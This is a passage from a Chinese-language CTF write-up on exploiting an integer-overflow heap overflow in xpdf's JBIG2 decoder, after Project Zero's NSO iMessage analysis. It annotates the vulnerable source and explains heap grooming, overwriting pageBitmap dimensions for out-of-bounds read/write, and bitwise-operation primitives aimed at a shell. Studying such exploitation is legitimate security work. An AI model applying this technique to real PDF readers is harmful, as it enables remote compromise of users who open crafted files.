skipped</span><br><span class="line">─────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────</span><br><span class="line"> ► f 0   0x555555675179</span><br><span class="line">   f 1   0x555555676c72</span><br><span class="line">   f 2   0x555555679198 JBIG2Stream::readSegments()+1032</span><br><span class="line">   f 3   0x555555679473 JBIG2Stream::reset()+211</span><br><span class="line">   f 4   0x55555560139a</span><br><span class="line">   f 5   0x5555556494a9</span><br><span class="line">   f 6   0x55555564aba0</span><br><span class="line">   f 7   0x55555563c9e5</span><br></pre></td></tr></table></figure><p>现在我们就完成了整个调试环境的搭建。</p><h2 id="三、漏洞点">三、漏洞点</h2><p>这题预期的解法是使用这篇 google project zero 的 <a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">iMessage exploit</a> 中的漏洞。漏洞点位于 <code>JBIG2Stream</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readTextRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                    GBool lossless, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                    Guint *refSegs, Guint nRefSegs)</span> </span>&#123;</span><br><span class="line">  ...</span><br><span class="line">  Guint numSyms;</span><br><span class="line">  ...</span><br><span class="line">  <span class="comment">// get symbol dictionaries and tables</span></span><br><span class="line">  codeTables = <span class="keyword">new</span> <span class="built_in">GList</span>();</span><br><span class="line">  <span class="comment">// 1. 初始时为 0</span></span><br><span class="line">  numSyms = <span class="number">0</span>;  </span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i]))) &#123;</span><br><span class="line">      <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict) &#123;</span><br><span class="line">        <span class="comment">// 2. 该变量与一个用户可控的值相加，会造成整数溢出</span></span><br><span class="line">        numSyms += ((JBIG2SymbolDict *)seg)-&gt;<span class="built_in">getSize</span>();</span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegCodeTable) &#123;</span><br><span class="line">        codeTables-&gt;<span class="built_in">append</span>(seg);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      ...</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  ...</span><br><span class="line">  <span class="comment">// get the symbol bitmaps</span></span><br><span class="line">  <span class="comment">// 3. 整数溢出后，这里分配了一个较小的堆内存（指针数组）</span></span><br><span class="line">  syms = (JBIG2Bitmap **)<span class="built_in">gmallocn</span>(numSyms, <span class="built_in">sizeof</span>(JBIG2Bitmap *));</span><br><span class="line">  kk = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i) &#123;</span><br><span class="line">    <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i]))) &#123;</span><br><span class="line">      <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict) &#123;</span><br><span class="line">        symbolDict = (JBIG2SymbolDict *)seg;</span><br><span class="line">        <span class="comment">// 4. 将各个指针写入该堆内存，触发堆溢出</span></span><br><span class="line">        <span class="keyword">for</span> (k = <span class="number">0</span>; k &lt; symbolDict-&gt;<span class="built_in">getSize</span>(); ++k) &#123;</span><br><span class="line">          syms[kk++] = symbolDict-&gt;<span class="built_in">getBitmap</span>(k);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>由于恶意构造的 <code>refSegs</code> 中，一些 <code>seg-&gt;getSize()</code> 值很大（4GB），因此如果全部写进则肯定会触发 crash。所以在实际的漏洞利用中，会尝试先做做堆风水：</p><p><img src="/2022/02/rwctf2022_hso/1.jpg" alt="img"></p><p>看图，exploit 需要将 <strong>segments GList 的后备存储</strong>，放置在<strong>刚刚创建的溢出堆块</strong>的<strong>高地址</strong>处。这样触发堆溢出时，就能在执行前几个正常 size 的写入操作时，<strong>将后备存储中的那个超大 size 所对应的 segment 指针，替换成非 JBIG2SymbolDict 类型的 segment 指针（即 JBIG2Bitmap 类型）</strong>。之后当程序检索这个 segment 指针时，就会跳过该指针的检索。</p><h2 id="四、漏洞利用前置知识">四、漏洞利用前置知识</h2><h3 id="1-JBIG2Decode">1. JBIG2Decode</h3><p>漏洞点位于 JBIG2Stream ，而 JBIG2Stream 又怎么存在于 pdf 中呢？</p><p>pdf 文件结构本质上是一个树状图，这里给出一个使用 JBIG2Stream 的 pdf 片段：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">4 0 obj</span><br><span class="line">&lt;&lt; /Filter /FlateDecode</span><br><span class="line">/Length 3988</span><br><span class="line">&gt;&gt;</span><br><span class="line">stream</span><br><span class="line">/* [MyStream1] */</span><br><span class="line">endstream</span><br><span class="line">endobj</span><br><span class="line"></span><br><span class="line">5 0 obj</span><br><span class="line">&lt;&lt; /DecodeParms  &lt;&lt; /JBIG2Globals 4 0 R &gt;&gt;</span><br><span class="line">/Width 1024</span><br><span class="line">/ColorSpace /DeviceGray</span><br><span class="line">/Height 1</span><br><span class="line">/Filter /JBIG2Decode</span><br><span class="line">/Subtype /Image</span><br><span class="line">/Length 418248</span><br><span class="line">/Type /XObject</span><br><span class="line">/BitsPerComponent 1</span><br><span class="line">&gt;&gt;</span><br><span class="line">stream</span><br><span class="line">/* [MyStream2] */</span><br><span class="line">endstream</span><br><span class="line">endobj</span><br></pre></td></tr></table></figure><blockquote><p>pdf 文件中，<code>4 0 obj</code>、<code>5 0 obj</code> 都是表示一个特定的 pdf object。</p></blockquote><p>其中，<code>4 0 obj</code> 标识了下面中的 <code>MyStream1</code>，其参数 <code>/Filter /FlateDecode</code> 表示该流是使用 zlib 压缩。</p><p>继续往下看可以看到： <code>5 0 obj</code> 中，<code>/DecodeParms</code> 引用了 <code>4 0 obj</code> 中的 stream 流，即 <code>MyStream1</code>；同时参数 <code>/Filter /JBIG2Decode</code> 指定了接下来的流 <code>MyStream2</code> 使用的解码方式是 <code>JBIG2Decode</code>。</p><p>因此从上文可以得知，<code>MyStream2</code> 使用 <strong>JBIG2Decode</strong> 进行解码，其解码参数为上面引用的这个 <code>4 0 obj</code>，即 <code>MyStream1</code> 使用 <code>FlateDecode</code> <strong>所解码后的流</strong>，而该参数的键为 <code>JBIG2Globals</code>。</p><p>而我们要做的，就是精心构建 <code>MyStream1</code> 和 <code>MyStream2</code>（这两个流都是 JBIG2Stream），使其在解析这两个 Stream 时能触发漏洞，从而 get shell。</p><p>构建好这两个流后，可以使用 <a href="https://github.com/agl/jbig2enc/blob/master/pdf.py">jbig2enc/pdf.py</a> 来创建出 pdf。</p><h3 id="2-Segments-小叙">2. Segments 小叙</h3><blockquote><p>注，这一节中，每个 segment 所对应的代码最好亲自阅读一下。</p></blockquote><p>当 xpdf 对 JBIG2Stream 解码时，正如上节中所示，JBIG2Decode 需要一个参数 <code>JBIG2Globals</code>。因此在解析时，会先解析 <code>JBIG2Globals</code> 的 stream，之后再解析下面的 main stream。以下代码说明了 stream 的解析过程：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::reset</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    GList *t;</span><br><span class="line"></span><br><span class="line">    segments = <span class="keyword">new</span> <span class="built_in">GList</span>();</span><br><span class="line">    globalSegments = <span class="keyword">new</span> <span class="built_in">GList</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// read the globals stream</span></span><br><span class="line">    <span class="keyword">if</span> (globalsStream.<span class="built_in">isStream</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 解析以 DecodeParms 传来的 global stream 流，即 FlateDecode(MyStream1)</span></span><br><span class="line">        curStr = globalsStream.<span class="built_in">getStream</span>();</span><br><span class="line">        curStr-&gt;<span class="built_in">reset</span>();</span><br><span class="line">        <span class="comment">// 解析时需要使用到解码器，这里是对解码器进行初始化</span></span><br><span class="line">        arithDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">        huffDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">        mmrDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">        <span class="comment">// 开始读取 segments</span></span><br><span class="line">        <span class="built_in">readSegments</span>();</span><br><span class="line">        curStr-&gt;<span class="built_in">close</span>();</span><br><span class="line">        <span class="comment">// swap the newly read segments list into globalSegments</span></span><br><span class="line">        t = segments;</span><br><span class="line">        segments = globalSegments;</span><br><span class="line">        globalSegments = t;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// read the main stream</span></span><br><span class="line">    <span class="comment">// 解析 main stream, 即 MySteram2</span></span><br><span class="line">    curStr = str;</span><br><span class="line">    curStr-&gt;<span class="built_in">reset</span>();</span><br><span class="line">    <span class="comment">// 同样对解码器进行初始化</span></span><br><span class="line">    arithDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">    huffDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">    mmrDecoder-&gt;<span class="built_in">setStream</span>(curStr);</span><br><span class="line">    <span class="built_in">readSegments</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (pageBitmap)</span><br><span class="line">    &#123;</span><br><span class="line">        dataPtr = pageBitmap-&gt;<span class="built_in">getDataPtr</span>();</span><br><span class="line">        dataEnd = dataPtr + pageBitmap-&gt;<span class="built_in">getDataSize</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        dataPtr = dataEnd = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里我们可以了解到，<strong>JBIG2Stream 是由多个 Segment 组成的</strong>，Segment 种类较多。这里我们只关注几个有用到的 Segment。</p><h4 id="a-EOFSeg">a. EOFSeg</h4><p>该 Segment 的解析标志了完成了全部 segment 的读取，没有其他用途。</p><h4 id="b-SymbolDictSeg">b. SymbolDictSeg</h4><p>SymbolDict 主要存放了<strong>一个指向 Bitmap 的指针数组</strong>。Bitmap 可以用于存放数据，在实际漏洞利用中将起到类似内存的作用。</p><p>对于每个 symbol dict 中的 Bitmap，规范中将其称为一个 <strong>instance</strong>。</p><p>解析 SymbolDictSeg 时，将会从 stream 中读取并创建出每一个 Bitmap。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">GBool <span class="title">JBIG2Stream::readSymbolDictSeg</span><span class="params">(Guint segNum, Guint length,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     Guint *refSegs, Guint nRefSegs)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// 创建 bitmaps 数组</span></span><br><span class="line">    <span class="comment">// get the input symbol bitmaps</span></span><br><span class="line">    bitmaps = (JBIG2Bitmap **)<span class="built_in">gmallocn</span>(numInputSyms + numNewSyms,</span><br><span class="line">                                       <span class="built_in">sizeof</span>(JBIG2Bitmap *));</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; numInputSyms + numNewSyms; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        bitmaps[i] = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    k = <span class="number">0</span>;</span><br><span class="line">    inputSymbolDict = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nRefSegs; ++i)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ((seg = <span class="built_in">findSegment</span>(refSegs[i])))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (seg-&gt;<span class="built_in">getType</span>() == jbig2SegSymbolDict)</span><br><span class="line">            &#123;</span><br><span class="line">                inputSymbolDict = (JBIG2SymbolDict *)seg;</span><br><span class="line">                <span class="keyword">for</span> (j = <span class="number">0</span>; j &lt; inputSymbolDict-&gt;<span class="built_in">getSize</span>(); ++j)</span><br><span class="line">                &#123;</span><br><span class="line">                    bitmaps[k++] = inputSymbolDict-&gt;<span class="built_in">getBitmap</span>(j);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// 开始尝试从外部 JBIG2Stream 流中读取 bitmap</span></span><br><span class="line">    symHeight = <span class="number">0</span>;</span><br><span class="line">    i = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &lt; numNewSyms)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// read the height class delta height</span></span><br><span class="line">        <span class="keyword">if</span> (huff) [...]</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            arithDecoder-&gt;<span class="built_in">decodeInt</span>(&amp;dh, iadhStats);</span><br><span class="line">        &#125; </span><br><span class="line">        [...]</span><br><span class="line">        symHeight += dh;</span><br><span class="line">        symWidth = <span class="number">0</span>;</span><br><span class="line">        totalWidth = <span class="number">0</span>;</span><br><span class="line">        j = i;</span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="comment">// read the symbols in this height class</span></span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// read the delta width</span></span><br><span class="line">            <span class="keyword">if</span> (huff) [...]</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">if</span> (!arithDecoder-&gt;<span class="built_in">decodeInt</span>(&amp;dw, iadwStats))</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            [...]</span><br><span class="line"></span><br><span class="line">            <span class="comment">// using a collective bitmap, so don&#x27;t read a bitmap here</span></span><br><span class="line">            <span class="keyword">if</span> (huff &amp;&amp; !refAgg) [...]</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> (refAgg) [...]</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// 从外部流中读取 bitmap 并将其保存进数组中</span></span><br><span class="line">                bitmaps[numInputSyms + i] =</span><br><span class="line">                    <span class="built_in">readGenericBitmap</span>(gFalse, symWidth, symHeight,</span><br><span class="line">                                    sdTemplate, gFalse, gFalse, <span class="literal">NULL</span>,</span><br><span class="line">                                    sdATX, sdATY, <span class="number">0</span>);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            ++i;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// read the collective bitmap</span></span><br><span class="line">        <span class="keyword">if</span> (huff &amp;&amp; !refAgg) [...]</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 创建了一个 symbolDict 结构体</span></span><br><span class="line">    <span class="comment">// create the symbol dict object</span></span><br><span class="line">    symbolDict = <span class="keyword">new</span> <span class="built_in">JBIG2SymbolDict</span>(segNum, numExSyms);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将上面创建的 bitmaps 数组复制进 symbolDict 结构体中</span></span><br><span class="line">    <span class="comment">// exported symbol list</span></span><br><span class="line">    i = j = <span class="number">0</span>;</span><br><span class="line">    ex = gFalse;</span><br><span class="line">    prevRun = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">while</span> (i &lt; numInputSyms + numNewSyms)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (huff)</span><br><span class="line">            [...]</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            arithDecoder-&gt;<span class="built_in">decodeInt</span>(&amp;run, iaexStats);</span><br><span class="line">        &#125;</span><br><span class="line">        [...]</span><br><span class="line">        <span class="keyword">if</span> (ex)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">for</span> (cnt = <span class="number">0</span>; cnt &lt; run; ++cnt)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">// 将上面创建的 bitmaps 对等深拷贝进 symbolDict 中</span></span><br><span class="line">                symbolDict-&gt;<span class="built_in">setBitmap</span>(j++, bitmaps[i++]-&gt;<span class="built_in">copy</span>());</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            i += run;</span><br><span class="line">        &#125;</span><br><span class="line">        ex = !ex;</span><br><span class="line">        prevRun = run;</span><br><span class="line">    &#125;</span><br><span class="line">    [...] <span class="comment">// 释放 bitmaps 数组</span></span><br><span class="line">    <span class="comment">// store the new symbol dict</span></span><br><span class="line">    segments-&gt;<span class="built_in">append</span>(symbolDict);</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="c-PageInfoSeg">c. PageInfoSeg</h4><p>对于每个 Page 来说，需要有一个 Bitmap 来表示当前页面渲染的数据。而在解析 PageInfoSeg 时，程序会创建一个流内全局 Bitmap：<strong>pageBitmap</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readPageInfoSeg</span><span class="params">(Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Guint xRes, yRes, flags, striping;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">readULong</span>(&amp;pageW) || !<span class="built_in">readULong</span>(&amp;pageH) ||</span><br><span class="line">        !<span class="built_in">readULong</span>(&amp;xRes) || !<span class="built_in">readULong</span>(&amp;yRes) ||</span><br><span class="line">        !<span class="built_in">readUByte</span>(&amp;flags) || !<span class="built_in">readUWord</span>(&amp;striping))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">goto</span> eofError;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// 创建流内全局字段 pageBitmap</span></span><br><span class="line">    pageBitmap = <span class="keyword">new</span> <span class="built_in">JBIG2Bitmap</span>(<span class="number">0</span>, pageW, curPageH);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// default pixel value</span></span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">eofError:</span><br><span class="line">    <span class="built_in">error</span>(errSyntaxError, <span class="built_in">getPos</span>(), <span class="string">&quot;Unexpected EOF in JBIG2 stream&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是，<strong>pageBitmap 很关键</strong>，它表示了一个 Page 的 bitmap。我们将使用堆溢出来覆写 pageBitmap 的 Width 和 Height，进而达到越界读写的目的。</p><blockquote><p>同时 PageInfoSeg 还可用于绕过一个 sanity check，下文中会提到。</p></blockquote><h4 id="d-GenericRegionSeg">d. GenericRegionSeg</h4><p>GenericRegionSeg 的解析将会<strong>从流中读取一个 Bitmap</strong>，并<strong>与当前的 pageBitmap 的特定区域进行运算</strong>：</p><blockquote><p>需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 GenericRegionSeg 不能存放在 JBIG2Globals 流中。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JBIG2Stream::readGenericRegionSeg</span><span class="params">(Guint segNum, GBool imm,</span></span></span><br><span class="line"><span class="params"><span class="function">                                       GBool lossless, Guint length)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// read the bitmap</span></span><br><span class="line">    bitmap = <span class="built_in">readGenericBitmap</span>(mmr, w, h, templ, tpgdOn, gFalse,</span><br><span class="line">                               <span class="literal">NULL</span>, atx, aty, mmr ? length - <span class="number">18</span> : <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// combine the region bitmap into the page bitmap</span></span><br><span class="line">    <span class="keyword">if</span> (imm)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (pageH == <span class="number">0xffffffff</span> &amp;&amp; y + h &gt; curPageH)</span><br><span class="line">        &#123;</span><br><span class="line">            pageBitmap-&gt;<span class="built_in">expand</span>(y + h, pageDefPixel);</span><br><span class="line">        &#125;</span><br><span class="line">        pageBitmap-&gt;<span class="built_in">combine</span>(bitmap, x, y, extCombOp);</span><br><span class="line">        <span class="keyword">delete</span> bitmap;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// store the region bitmap</span></span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，从流中读取 Bitmap 的操作位于 <code>readGenericBitmap</code> 函数中，读取的操作需要使用到<strong>编码器</strong>。</p><p>而与 pageBitmap 的运算主要是使用 <code>JBIG2Bitmap::combine</code> 方法，该方法中有五种运算方式，分别是 <strong>与、或、异或和替换</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">switch</span> (combOp)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>: <span class="comment">// or</span></span><br><span class="line">        dest |= src1 &amp; m2;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">1</span>: <span class="comment">// and</span></span><br><span class="line">        dest &amp;= src1 | m1;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">2</span>: <span class="comment">// xor</span></span><br><span class="line">        dest ^= src1 &amp; m2;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">3</span>: <span class="comment">// xnor</span></span><br><span class="line">        dest ^= (src1 ^ <span class="number">0xff</span>) &amp; m2;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">4</span>: <span class="comment">// replace</span></span><br><span class="line">        dest = (src1 &amp; m2) | (dest &amp; m1);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>我们可以将<strong>外部的立即数</strong>，通过利用该段的解析过程，将其传入 pageBitmap 中等待进一步的运算。</p></blockquote><h4 id="e-GenericRefinementRegionSeg">e. GenericRefinementRegionSeg</h4><p>GenericRefinementRegionSeg 的解析过程，组合起来可以对 pageBitmap 上的部分数据进行位运算。我们可以利用这里的位运算来构建加法器：</p><figure class="highlight 